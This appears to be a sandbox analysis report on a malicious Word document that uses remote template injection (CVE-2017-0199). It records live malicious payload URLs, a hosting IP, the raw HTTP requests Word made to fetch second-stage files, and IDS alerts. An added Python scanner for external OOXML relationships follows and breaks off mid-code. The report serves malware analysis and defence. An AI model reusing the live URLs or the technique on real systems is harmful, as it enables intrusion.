Windows Analysis Report
_________19.03.docx

Overview

General Information

Sample name: _________19.03.docx
Analysis ID: 1668984
MD5: f9026fabfb8d131863ad06fd72eb2717
SHA1: ffa14e589d99a95d025b0ae5d7122319195622f7
SHA256: 4640c58e3c658d8178f4e9d9570566040ad162e25b61a46b0be989aeb69db679
Tags: cve-2017-0199, docx, user-zhuzhu0009

Detection

Score: 68
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Contains an external reference to another file
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses a known web browser user agent for HTTP communication

Classification

Classification categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner (legend: clean, suspicious, malicious)
  • System is w10x64
  • WINWORD.EXE (PID: 7720 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  • cleanup
No configs have been found
No yara matches
Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49716, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 7720, Protocol: tcp, SourceIp: 91.218.228.26, SourceIsIpv6: false, SourcePort: 80
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-19T02:44:47.340125+0200 | 2033858 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49735 | 91.218.228.26 | 80 | TCP
2025-04-19T02:44:46.343974+0200 | 2055080 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49734 | 91.218.228.26 | 80 | TCP
2025-04-19T02:44:43.229507+0200 | 2800029 | 1 | Attempted User Privilege Gain | 91.218.228.26 | 80 | 192.168.2.4 | 49726 | TCP
2025-04-19T02:44:40.837742+0200 | 1810005 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49719 | 91.218.228.26 | 80 | TCP
2025-04-19T02:44:45.155817+0200 | 1810005 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 91.218.228.26 | 80 | TCP


AV Detection

Source: http://clack.su/fox.docx | Avira URL Cloud: Label: malware
Source: http://valisi.ru/first.rtf | Avira URL Cloud: Label: malware
Source: _________19.03.docx | Virustotal: Detection: 44%
Source: _________19.03.docx | ReversingLabs: Detection: 41%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: global traffic | DNS query: name: clack.su
Source: global traffic | DNS query: name: clack.su
Source: global traffic | DNS query: name: valisi.ru

Networking

Source: Network traffic | Suricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.4:49731 -> 91.218.228.26:80
Source: Network traffic | Suricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.4:49719 -> 91.218.228.26:80
Source: Network traffic | Suricata IDS: 2033858 - Severity 1 - ET MALWARE TA399/Sidewinder Activity Payload Request M2, Microsoft Office UA Request for .rtf : 192.168.2.4:49735 -> 91.218.228.26:80
Source: Network traffic | Suricata IDS: 2055080 - Severity 1 - ET MALWARE TA399/Sidewinder Activity Payload Request M3, Microsoft Word UA Request for .rtf : 192.168.2.4:49734 -> 91.218.228.26:80
Source: Network traffic | Suricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 91.218.228.26:80 -> 192.168.2.4:49726
Source: Joe Sandbox View | ASN Name: IHCRUInternet-HostingLtdMoscowRussiaRU
Source: global traffic | HTTP traffic detected:
  GET /fox.docx HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
  Accept-Encoding: gzip, deflate
  Host: clack.su
  Connection: Keep-Alive
  Cookie: PHPSESSID=b9e6303e515dc6233f459e6662a37489; wfvt_733659977=6802f1f8a0a59
Source: global traffic | HTTP traffic detected:
  GET /first.rtf HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
  Accept-Encoding: gzip, deflate
  Host: valisi.ru
  Connection: Keep-Alive
  Cookie: PHPSESSID=9f1887f17763dca70f238dcccd64fc52; wfvt_1026485859=6802f1fcf250d
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 200 OK
  Connection: Keep-Alive
  Keep-Alive: timeout=5, max=100
  content-type: application/vnd.openxmlformats-officedocument.wordprocessingml.document
  last-modified: Wed, 19 Mar 2025 11:29:09 GMT
  etag: "6eac-67daaa85-b8348916368e5d6e;;;"
  accept-ranges: bytes
  content-length: 28332
  date: Sat, 19 Apr 2025 00:44:42 GMT
  server: LiteSpeed
Source: global traffic | DNS traffic detected: DNS query: clack.su
Source: global traffic | DNS traffic detected: DNS query: valisi.ru
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Connection: Keep-Alive
  Keep-Alive: timeout=5, max=100
  x-powered-by: PHP/5.4.45
  set-cookie: wfvt_1026485859=6802f1fe1a5cc; expires=Sat, 19-Apr-2025 01:14:46 GMT; path=/; httponly
  content-type: text/html; charset=UTF-8
  expires: Wed, 11 Jan 1984 05:00:00 GMT
  cache-control: no-cache, must-revalidate, max-age=0
  pragma: no-cache
  link: <http://valisi.ru/wp-json/>; rel="https://api.w.org/"
  date: Sat, 19 Apr 2025 00:44:46 GMT
  server: LiteSpeed
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Connection: Keep-Alive
  Keep-Alive: timeout=5, max=100
  x-powered-by: PHP/5.4.45
  set-cookie: wfvt_1026485859=6802f1ff2de53; expires=Sat, 19-Apr-2025 01:14:47 GMT; path=/; httponly
  content-type: text/html; charset=UTF-8
  expires: Wed, 11 Jan 1984 05:00:00 GMT
  cache-control: no-cache, must-revalidate, max-age=0
  pragma: no-cache
  link: <http://valisi.ru/wp-json/>; rel="https://api.w.org/"
  transfer-encoding: chunked
  content-encoding: gzip
  vary: Accept-Encoding
  date: Sat, 19 Apr 2025 00:44:47 GMT
  server: LiteSpeed
Source: classification engine | Classification label: mal68.evad.winDOCX@2/5@3/1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File created: C:\Users\user\Desktop\~$_______19.03.docx
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\{66050E71-1D72-4227-BAD7-A2759737A87A} - OProcSessId.dat
Source: ~WRD0000.tmp.0.dr | OLE indicator, Word Document stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process created: unknown unknown
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: ~WRD0000.tmp.0.dr | Initial sample: OLE zip file path = word/theme/_rels/theme1.xml.rels
Source: ~WRD0000.tmp.0.dr | Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: ~WRD0000.tmp.0.dr | Initial sample: OLE zip file path = customXml/item2.xml
Source: ~WRD0000.tmp.0.dr | Initial sample: OLE zip file path = customXml/itemProps2.xml
Source: ~WRD0000.tmp.0.dr | Initial sample: OLE zip file path = customXml/item3.xml
Source: ~WRD0000.tmp.0.dr | Initial sample: OLE zip file path = customXml/itemProps3.xml
Source: ~WRD0000.tmp.0.dr | Initial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: ~WRD0000.tmp.0.dr | Initial sample: OLE zip file path = customXml/_rels/item3.xml.rels
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: ~WRD0000.tmp.0.dr | Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Source: settings.xml.rels | Extracted files from sample: http://clack.su/fox.docx
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process information queried: ProcessInformation
MITRE ATT&CK Matrix (listed per tactic; the number in brackets is the signature count shown next to that technique in the report's matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Windows Management Instrumentation [11]; Exploitation for Client Execution [3]; At; Cron; Launchd
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: Process Injection [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: Masquerading [1]; Virtualization/Sandbox Evasion [1]; Process Injection [1]; Binary Padding; Software Packing
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Security Software Discovery [1]; Virtualization/Sandbox Evasion [1]; Process Discovery [1]; File and Directory Discovery [1]; System Information Discovery [2]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: Non-Application Layer Protocol [4]; Application Layer Protocol [14]; Ingress Tool Transfer [4]; Protocol Impersonation; Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
Behavior Graph (rendered as an image in the original; only the node text is recoverable): Behavior Graph ID: 1668984; Sample: _________19.03.docx; Startdate: 19/04/2025; Architecture: WINDOWS; Score: 68. DNS/IP nodes: valisi.ru; clack.su. Signature nodes: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; Contains an external reference to another file. Process node: WINWORD.EXE started (165 created registry values, 96 created files, per the graph legend). Network node: clack.su 91.218.228.26, ports 49716, 49719, 49724, IHCRUInternet-HostingLtdMoscowRussiaRU, Russian Federation. Dropped file node: C:\Users\user\...\_________19.03.docx (copy), Microsoft.

Source | Detection | Scanner | Label
_________19.03.docx | 45% | Virustotal |
_________19.03.docx | 42% | ReversingLabs | Document-Word.Trojan.RemoteTemplateInj
No Antivirus matches

Source | Detection | Scanner | Label
http://clack.su/fox.docx | 100% | Avira URL Cloud | malware
http://valisi.ru/first.rtf | 100% | Avira URL Cloud | malware


Name | IP | Active | Malicious | Antivirus Detection | Reputation
valisi.ru | 91.218.228.26 | true | true | | unknown
s-0005.dual-s-msedge.net | 52.123.129.14 | true | false | | high
clack.su | 91.218.228.26 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://clack.su/fox.docx | true | Avira URL Cloud: malware | unknown
http://valisi.ru/first.rtf | true | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
91.218.228.26 | valisi.ru | Russian Federation | 203226 | IHCRUInternet-HostingLtdMoscowRussiaRU | true
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1668984
Start date and time: 2025-04-19 02:43:32 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 30s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: _________19.03.docx
Detection: MAL
Classification: mal68.evad.winDOCX@2/5@3/1
Cookbook Comments:
• Found application associated with file extension: .docx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, sppsvc.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.109.20.38, 23.202.75.249, 52.109.8.36, 20.42.65.84, 23.1.33.10, 23.1.33.18, 52.111.230.25, 52.111.230.27, 52.111.230.26, 52.111.230.24, 52.123.129.14, 40.126.28.20, 204.79.197.222, 4.245.163.56
• Excluded domains from analysis (whitelisted): fp.msedge.net, slscr.update.microsoft.com, scus-azsc-config.officeapps.live.com, templatesmetadata.office.net.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, prod-eus-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, osiprod-cus-buff-azsc-000.centralus.cloudapp.azure.com, login.live.com, onedscolprdeus02.eastus.cloudapp.azure.com, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, c.pki.goog, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod-na.naturallanguageeditorservice.osi.office.net.akadns.net, prod.roaming1.live.com.akadns.net, cus-azsc-000.roaming.officeapps.live.com, fe3cr.delivery.mp.microsoft.com, us1.roaming1.live.com.akadn
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        No simulations
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        91.218.228.26#U0434#U043e#U0433#U043e#U0432#U043e#U0440.pdf.lnkGet hashmaliciousUnknownBrowse
        • ecols.ru/ecols.hta
        ____ ______.xls.lnk.bin.lnkGet hashmaliciousMetasploitBrowse
        • ecols.ru/ecols.hta
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        s-0005.dual-s-msedge.netYour Shipment Is On Its Way.emlGet hashmaliciousUnknownBrowse
        • 52.123.129.14
        3a8e85ffd4abGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
        • 52.123.129.14
        Message.emlGet hashmaliciousHTMLPhisherBrowse
        • 52.123.128.14
        Message.emlGet hashmaliciousUnknownBrowse
        • 52.123.128.14
        FFL-2025-00947 PAYMENT.docx.docGet hashmaliciousUnknownBrowse
        • 52.123.128.14
        FFL-2025-00947 PAYMENT.docx.docGet hashmaliciousUnknownBrowse
        • 52.123.129.14
        richardsewell-4-15-24.Bayer Heritage FCU BHFCU0425.emlGet hashmaliciousUnknownBrowse
        • 52.123.129.14
        $RCNW0Y4.emlGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
        • 52.123.129.14
Match | Associated Sample Name / URL | Detection | Threat Name | Context
 | Deal Sheet & Commitment-New Deal (1).eml | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 52.123.128.14
 | phish_alert_sp2_2.0.0.0.msg | malicious | Unknown | 52.123.128.14
Match | Associated Sample Name / URL | Detection | Threat Name | Context
IHCRU Internet-Hosting Ltd, Moscow, Russia (RU) | 1isequal9.x86_64.elf | malicious | Unknown | 185.87.196.255
 | #U0434#U043e#U0433#U043e#U0432#U043e#U0440.pdf.lnk (Cyrillic "договор.pdf.lnk", i.e. "contract") | malicious | Unknown | 91.218.228.26
 | ____ ______.xls.lnk.bin.lnk | malicious | Metasploit | 91.218.228.26
 | f8PZ0Uuwau.exe | malicious | DCRat, PureLog Stealer, zgRAT | 217.144.98.170
 | grxpiPs2Fw.elf | malicious | Mirai, Moobot | 91.218.228.164
 | http://hotel-karmen.ru | malicious | Unknown | 37.143.13.155
 | LockyRansom.exe | malicious | Unknown | 37.143.9.154
 | LockyRansom.exe | malicious | Unknown | 37.143.9.154
 | KtMg6d1Ivx.exe | malicious | DCRat, PureLog Stealer, zgRAT | 185.87.199.107
 | https://googleads.g.doubleclick.net/pcs/click?xai=AKAOjsuLaMSxRbnmx4CaSYBD7UEX1peDpNeYnMWW4dVza-G52TGjr2vj5pKsC0MnZ5wKKbv48DTu4_9zifCV__nn-40JMtKyE_J-VMT8wv7a1Lf0nNBgkN5ubnqB_fbDSNDoYvSXrEeZ7mt6jhn1Gl78NJ_xm24v553oIbpIcOlySTxRzwS3ROTWKkuLKGhJpg1kkeB-2p7L0D_C0Tx_5HYnjwuOs8n8jzqBq4O3iSh2WW3Es8m8o5Fm3xTlO9UbT5wj7XWQmwefhVbuqmrnfemDwqzjrWGaSNRRqB_R9QTXSQjdFDdWTx0_Oo7RzbAWcjKqQR2JbLAW_ZYkDd6cz8q8BYpJJzzkZ6QKuyXH_CCgkPoul09CafKLox9uieqQMwQ&sai=AMfl-YQSMSxmTEvfKP4k3QH0IYz2PIsK1wo62PVWE2-bo7ZdB4Yue3XhmrRw5NnkQ1uiDEixQcvMUgBuCbvmwfqOzcwUGUmidc9tgXXMjS8Z7zb-8rHzyMziFnJ7Kv7S6gwBuwmLhiK3qougMvlVE4DWmw&sig=Cg0ArKJSzCxoV_8QjjEU&fbs_aeid=%5Bgw_fbsaeid%5D&adurl=https://dubaieventhost.com?26utm_source%3Dacuityads%26utm_medium%3Ddisplay%26utm_campaign%3D23%26utm_content%3D728x90_CyberWeek%26utm_term%3DNOOFR%26dclid%3D%25edclid! | malicious | Unknown | 95.183.11.171
No context
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        File Type:GIF image data, version 89a, 15 x 15
        Category:dropped
        Size (bytes):663
        Entropy (8bit):5.949125862393289
        Encrypted:false
        SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
        MD5:ED3C1C40B68BA4F40DB15529D5443DEC
        SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
        SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
        SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
        Malicious:false
        Reputation:high, very likely benign file
        Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        File Type:Microsoft Word 2007+
        Category:dropped
        Size (bytes):56704
        Entropy (8bit):7.763520369568193
        Encrypted:false
        SSDEEP:768:ia9BfkLt5wPhPrxqkpYzhZzfIb72hgKc4/GkFEXRtv/hvTnqRINkagCI2eR+Grl:RB6upRUhE7YS4+Cmrv/hvTghagDR+G5
        MD5:CEE10264E377550CD27C2838667B1165
        SHA1:F25B660A099FE4D7BC77365FC2C6099F7554863E
        SHA-256:91325863AD76519F7A0F26EF86AABE89534B25E162824B97D43230FA1278254C
        SHA-512:553413C906A2DFF5B8CF64816B21C69BEB8B48C834A56432BA48040D801F5095E2F4D5837A4C7450A5C32417997F762C9140232224D2739DC6EB1D7AA670D593
        Malicious:true
        Reputation:low
        Preview:PK..........!...K.....m.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H...W...B.).]8."-H\]{...%{...3I..A!.!..DJf.}..-gf...d.....`...e.W.-.v{s59cYB.0.A.6.....`v...2.v.`+.p.y.+.".>..H..H.q...b..d:...w..'Xi.....bm0.|....}.%.~6..W.......[...75"...@..G..M.T9U.9i.C:.........?...d.".oa).?....rm.2.\f../K-....B..R.}.&o#Vh....!......k.{.}H.qZ.J."jh{...?`8.....pk..H.......H.1.......D*..`.......Q....).G.q..h.;!....v..+......A#.k.F.o.{.......i....'?.00F....H..4..'....2....G.....2U.$
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):4.731640959097586
        Encrypted:false
        SSDEEP:3:KVGl/lilKlRAGlAbF/4cux5mFMNh9VOVBiFHeb9V7HHKmRaa+qY6P:KVy/4KDyJruxmMNrVOjPb9NHHKm8LqXP
        MD5:73410AC45720096DF62C56DF7C8004ED
        SHA1:A1F1267BB5D67F3DC9CB55D40A105A83D17EC16D
        SHA-256:FBC7910A9373E8CD5C6AF5902A502007BC36D09F920CC6D08E6AD8FC04D43A9C
        SHA-512:9B6B397433871D0BD64A8C2220F2499DFFF92A99558AA018A4EA5B855E9E8498DFF06148315F77C6F424BCC8BC59A4AF2CD334A4CDAA39235C6DE959B16DAC13
        Malicious:false
        Reputation:low
        Preview:.user..................................................j.o.n.e.s...{...k..p.p`[..<..%..J.k3....i....l.Y.X.+.....`..k7..~a...........'.$'O.}.aj....0.N..=.j
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        File Type:Microsoft Word 2007+
        Category:dropped
        Size (bytes):56704
        Entropy (8bit):7.763520369568193
        Encrypted:false
        SSDEEP:768:ia9BfkLt5wPhPrxqkpYzhZzfIb72hgKc4/GkFEXRtv/hvTnqRINkagCI2eR+Grl:RB6upRUhE7YS4+Cmrv/hvTghagDR+G5
        MD5:CEE10264E377550CD27C2838667B1165
        SHA1:F25B660A099FE4D7BC77365FC2C6099F7554863E
        SHA-256:91325863AD76519F7A0F26EF86AABE89534B25E162824B97D43230FA1278254C
        SHA-512:553413C906A2DFF5B8CF64816B21C69BEB8B48C834A56432BA48040D801F5095E2F4D5837A4C7450A5C32417997F762C9140232224D2739DC6EB1D7AA670D593
        Malicious:false
        Reputation:low
        Preview:PK..........!...K.....m.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H...W...B.).]8."-H\]{...%{...3I..A!.!..DJf.}..-gf...d.....`...e.W.-.v{s59cYB.0.A.6.....`v...2.v.`+.p.y.+.".>..H..H.q...b..d:...w..'Xi.....bm0.|....}.%.~6..W.......[...75"...@..G..M.T9U.9i.C:.........?...d.".oa).?....rm.2.\f../K-....B..R.}.&o#Vh....!......k.{.}H.qZ.J."jh{...?`8.....pk..H.......H.1.......D*..`.......Q....).G.q..h.;!....v..+......A#.k.F.o.{.......i....'?.00F....H..4..'....2....G.....2U.$
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):26
        Entropy (8bit):3.95006375643621
        Encrypted:false
        SSDEEP:3:ggPYV:rPYV
        MD5:187F488E27DB4AF347237FE461A079AD
        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
        Malicious:false
        Reputation:high, very likely benign file
        Preview:[ZoneTransfer]....ZoneId=0
        File type:Microsoft OOXML
        Entropy (8bit):7.928562966578789
        TrID:
        • Word Microsoft Office Open XML Format document (49504/1) 58.23%
        • Word Microsoft Office Open XML Format document (27504/1) 32.35%
        • ZIP compressed archive (8000/1) 9.41%
        File name:_________19.03.docx
        File size:52'301 bytes
        MD5:f9026fabfb8d131863ad06fd72eb2717
        SHA1:ffa14e589d99a95d025b0ae5d7122319195622f7
        SHA256:4640c58e3c658d8178f4e9d9570566040ad162e25b61a46b0be989aeb69db679
        SHA512:496f7ea4bd96533f02623a6a5755eccec6d7e4b16c46924a8d41951ec862e274c4ec7b4aa43f2db8ab08379cb2309287c7455e54fab56175f40d6d0848773a2c
        SSDEEP:1536:NKvY2UlwL6buqh9dLpHmcTyAiC5SzkAXulN:NKgtu4dLwcGAiC53iQN
        TLSH:B433E010CE1C1026C746A7346A4D1D86F70DD16AEAC1B72B6E56DACC4982BC35F27CDA
        File Content Preview:PK..........!.........N......._rels/.rels..QK.0.....C..-..D..{...D...m.....F...VPtp.{l.|......Q.q..x........|...}\...B...<k8q.]s}.}..........g..H.G.f..r."....4..g.1.9P....[L.....jo5......"/a..s...y......Gao..b*.I\.F..z..6....H1V..x.h....iqb!KBhB..>.......
        Icon Hash:35e5c48caa8a8599
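The static info above identifies the sample as a Microsoft OOXML package, i.e. a zip of XML parts whose links between parts live in `*.rels` files. A document of this kind makes Word fetch a second stage on open by carrying a relationship with `TargetMode="External"` whose target is an http:// or UNC location (the remote-template / OLE-link technique, of which CVE-2017-0199 is the best-known instance), which is also what drives the network activity recorded below. The following Python is an added example, not code from Joe Sandbox or from the analysed sample: it builds a constructed minimal .docx in memory (the relationship target `http://remote.example/template.rtf` and the part layout are hypothetical and do not reproduce the sample's contents) and reports every external relationship, ranking the types Office resolves automatically above plain hyperlinks, which need a click.

```python
"""List OOXML relationships that point outside the package.

Added example; not part of the sandbox report or the sample. The .docx it
scans is constructed inline below and the external target in it is made up.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

# Relationship types Office resolves on its own when the document is opened.
# A hyperlink is external too, but only fires when the user clicks it.
HIGH_RISK_TYPES = ("oleObject", "attachedTemplate", "frame", "subDocument")

# http(s)://, file:// or a \\server\share UNC path: all reach off the host.
REMOTE_TARGET = re.compile(r"^(https?:|file:|\\\\)", re.I)


def external_relationships(package: bytes) -> list:
    """Return every TargetMode="External" relationship found in any *.rels part."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                findings.append({
                    "part": name,
                    "id": rel.get("Id"),
                    "type": rel_type,
                    "target": target,
                    "high_risk": rel_type in HIGH_RISK_TYPES and bool(REMOTE_TARGET.match(target)),
                })
    return findings


def build_docx(document_rels: str) -> bytes:
    """Construct the smallest .docx that Word's package model accepts, with the
    given word/_rels/document.xml.rels part. Test fixture only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0" encoding="UTF-8"?>'
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                   '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
                   '<Default Extension="xml" ContentType="application/xml"/>'
                   '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
                   '</Types>')
        z.writestr("_rels/.rels",
                   '<Relationships xmlns="%s">' % RELS_NS +
                   '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>'
                   '</Relationships>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>')
        z.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


# Constructed relationship part: one internal link (ignored), one hyperlink
# (external, click-to-fire) and one OLE link to a hypothetical http:// target,
# which Word fetches automatically when the document opens.
SAMPLE_RELS = (
    '<Relationships xmlns="%s">' % RELS_NS +
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
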